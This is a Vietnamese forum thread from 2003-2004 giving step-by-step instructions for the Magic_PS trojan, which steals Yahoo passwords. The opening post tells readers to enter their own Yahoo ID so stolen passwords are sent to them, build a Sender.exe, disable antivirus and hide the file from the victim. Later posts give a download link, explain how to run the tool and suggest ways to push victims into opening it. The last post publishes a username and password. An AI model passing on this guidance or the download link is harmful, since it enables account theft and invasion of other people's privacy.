PDA

View Full Version : an cap pas bang Magic-PS

than_long_giao
20-12-2003, 20:59
Lấy Pass Yahoo bằng Magic_PS

Một con trojan lấy pass theo hình thức gửi tin nhắn qua yahoo nó có tính năng khá nguy hiểm là lấy pass yahoo rất dễ mà bạn khó lòng có thể phát hiện ra được , tuy nhiên nó có thể bị Antivirut phát hiện ra và quét ngay . Đầu tiên bạn hãy download và giải nén trojan Magic_PS nó có các phiên bản sau :

Magic_PS_11b.zip

Magic_PS_14.zip

Magic_PS_141.zip

Magic_PS_141_un.zip

Ở ô Y ! ID bạn điền vào đó nick của bạn ở yahoo để con trojan này gửi vể cho bạn qua tin nhắn sau đó chọn Creat MPS thì một file " Sender .exe đã được tạo ra trước khi làm việc này bạn nên tắt Antivirut đi vì có thể con trojan bạn tạo ra sẽ bị Antivirut tiêu diệt ngay , còn việc dấu ở đâu cho kĩ để victim không phát hiện ra được đó là ở các bạn

Chúc thành công ! va vui vẻ
Bài sưu tầm

gianghohiepkhach
12-01-2004, 13:55
để tui noi' sơ qua về con vi rut MPS này
khi bạn down về thì với điều kiện trên máy của bnạ phải có winzip để giả nén cho no' . Khi giả nén xong rùi hãy gõ địa chỉ ID của mình vào đó.
Con virut này chỉ lấy được pass tại máy mà mình cài đặt nó thôi, nó sẽ gửi pass cho mình dưới dạng offline trong yahoo.
à bạn hãy đưa ra đường link down cho mọi người nhé

nhattoanvuitinh2003
22-01-2004, 19:16
hic!!không có link thì sao mà down về!!hic!!

gianghohiepkhach
26-01-2004, 11:45
hic!!không có link thì sao mà down về!!hic!!
http://foreverloves.com/Magic_PS_141.zip đó down đi .................................................. .....

son dai ca
31-01-2004, 19:58
Nguy hiểm qua cha loại virut này thật la nguy hiểm nhưng làm sao mà tải về được cơ chứ, chán ghê cơ.........

gianghohiepkhach
02-02-2004, 15:26
trùi vậy mà cũng biết tải về nhấp vào đường link mà tui đưa ở trên đó down về giả nén sử dụng nếu ko biết nữa thì ở nhà ngủ đi đừng lên net làm gì

thanchetdaiduong
02-02-2004, 20:01
nếu không muốn bạn nhấn chuột phải chọn save targes as ...
==>> tải về sẽ nhanh hơn đó .
còn nếu vẫn không làm được thì bó tay thật rồi .( về học nhé bao giờ học được thì hãy học hack pass sau nhé)

ly_tam_quan
10-02-2004, 13:38
Đúng đó không biết thì về nhà học đi. khi nào học mà cảm thấy có thể đi hakc người khác được thì hãy xữ dụng nhữ cái này. ok
chứ không biết mà vào đây cứ hỏi hoài thì người khác làm gì có thời gian mà dạy bảo!!!!!!!!! ^_^

o0o_AlexMack_o0o
10-02-2004, 18:25
ê cho hỏi cái tui còn chưa bít giải nén vậy kính mong mấy ông chỉ bảo giùm tui sẽ đa tạ he he!
cảm ơn trước!
thank!
còn nữa WZ tui có thể down ở đâu? cho tui link luôn nhá!

o0o_AlexMack_o0o
10-02-2004, 18:36
hê tui có WZ rùi nhưng mà vẫn chưa giải nén được tại sao vậy??kick vô đâu để giải nén vậy??tui vẫn chưa bit he he
hack mới vô nghề mà thông cảm!

hai_p
10-02-2004, 19:04
đầu tiên phải dowload về rồi sau đó giải nén bằng cách cho chạy qua winzip .Sau khi đã giải nén xong sẽ có 3 giao diện xuất hiện .1 là Readme.txt .2 là magic_PS_141.exe .3 là Hitory.txt .Bạn nhấn vào magic_PS_141 se hiện lên một khung .bạn chỉ cấn điền ID của bạn vào đó là ok rồi . chúc bạn may mắn nhé.

ly_tam_quan
10-02-2004, 19:28
ai mà không biết xử dụng cái đồ quỷ đó ............
cần gì các hạ chỉ dạy!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!^_^

kiep_ngao_du
12-02-2004, 11:34
Cho em hỏi cái này coi , nếu như mình gởi file đó qua bên kẽ địch mà họ không chịu nhận hay bấm dowload gi đó thi phải làm sao hả mấy đại ca , có cách nào hay hay chỉ dùm đệ luôn coi .

ly_tam_quan
12-02-2004, 18:39
thì gọi điện thoại cho nó kêu nó down về..........................
còn nó không chịu thì Bomb cho nó chịu....ok...........^_^

LSB_Tienlagiay
12-02-2004, 20:21
thì gọi điện thoại cho nó kêu nó down về..........................
còn nó không chịu thì Bomb cho nó chịu....ok...........^_^

8O :lol: cả nhà vỗ tay nào nói thiệt mấy cái trò trẻ con này chỉ cần người nào hơi biết chút ít về mạng là đêck bao giờ lấy được đâu trừ khi chọn đúng máy nó ngồi rồi cài vô thì may ra ......

o0o_AlexMack_o0o
15-02-2004, 09:12
ừ thèng ban tui làm được rùi hay đấy tui cũng làm được luôn hì! hay quá thật là tuyệt vời á hay thật là hay hì nhưng mà nè nếu xoá con virut đó đi thì mất tác dụng àh?

truongvoki
15-02-2004, 13:09
huynh có thể nói tác dụng củc con virut đó nghe thử coi nếu không nói được chắc là huynh nói khoác đó!!!!!!!!!!!!!!!!!

truongvoki
15-02-2004, 13:09
huynh có thể nói tác dụng củc con virut đó nghe thử coi nếu không nói được chắc là huynh nói khoác đó!!!!!!!!!!!!!!!!!

o0o_AlexMack_o0o
15-02-2004, 14:48
tác dụng của nó đã được nêu ở trên rùi đệ không đọck sao? hay là đệ bị mù chữ???hì có gì bỏ qua nha'

truongvoki
15-02-2004, 19:17
làm gì nói nặng dậy huynh không biết thì đệ mới hỏi nếu biết thì đệ đâu có cần hỏi cái ông anh ít kỉ như huynh đâu!!!!!!!!!!!!!!1

ly_tam_quan
15-02-2004, 19:25
đúng thế rồi còn chối cãi gì nữa!!!!!!!!!!!!!!!! ^_^
tác dụng của nó ở trên thì không đọc mà cứ hoải hoài ai ở không mà chỉ cho đệ chứ hả truongvoki.
bộ đệ tưởng ai cũng rãnh như đệ hả?? ^_^

truongvoki
16-02-2004, 07:01
nếu đệ biết thì cóc cần hỏi cái bản mặt ít kỉ của huynh đâu đúng không nè!!!!!!!!!!!!!!!!!!!!!!!!!!!

ly_tam_quan
16-02-2004, 07:08
cái huynh lý tầm quan này sao mà hay nói nóc người khác hoài vậy!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
cái chuyện đó thì không phải chỉ mình huynh nói đâu!!! mà nhiều người nói đệ rùi đó. thiệt tình
chứ đệ nghĩ coi cách mà người ta đưa ra cho đệ học ở trên thì đệ không đọc mà cứ đi hỏi người ta thì đệ nghĩ coi người khác có phiền không!!! ^_^

nguoi khong co don
26-02-2004, 09:45
các anh em ơi có cách nào để hack pass từ xa không chứ caì virus vào máy thì victim se rất rễ phát hiện ra mà delete một phát là xong.
anh em lương sơn có cách nào hack từ xa hay mà victim ko phát hiện ra đươc thì post bài lên cho anh em lương sơn cùng học hỏi.

o0o_AlexMack_o0o
26-02-2004, 17:16
đúng rùi đấy theo kokichi nghĩ thì hakc từ xa vẫn hơn chứ? thế là chỉ cần đối tượng dính chưởng từ xa mà cần gì phải là gài vô máy?
hình như là một vài nguòi ở SG biết cách hack này đấy bạn của kokichi cũng đã bị hack một lần!

Quach_Tinh_lata
26-02-2004, 19:11
mấy cài chò này bây giờ không lừa được đâu, chỉ cần họ để ý là sẽ không bị dính đâu. mà sao mọi người không đọc kỹ đi ở trên họ đã chỉ dẫn thế rùi mà vẫn không làm được thì bó tay rùi

unlucky_princer0279
27-02-2004, 12:56
Xin cho lão phu hỏi các huynh đệ một câu nhé
"Lấy pass để làm gì?" chả có gì hay ho cả
Đây, pass của lão phu đây mời huynh đệ dùng tạm
user: unlucky_princer0279 pass: loigoichanmay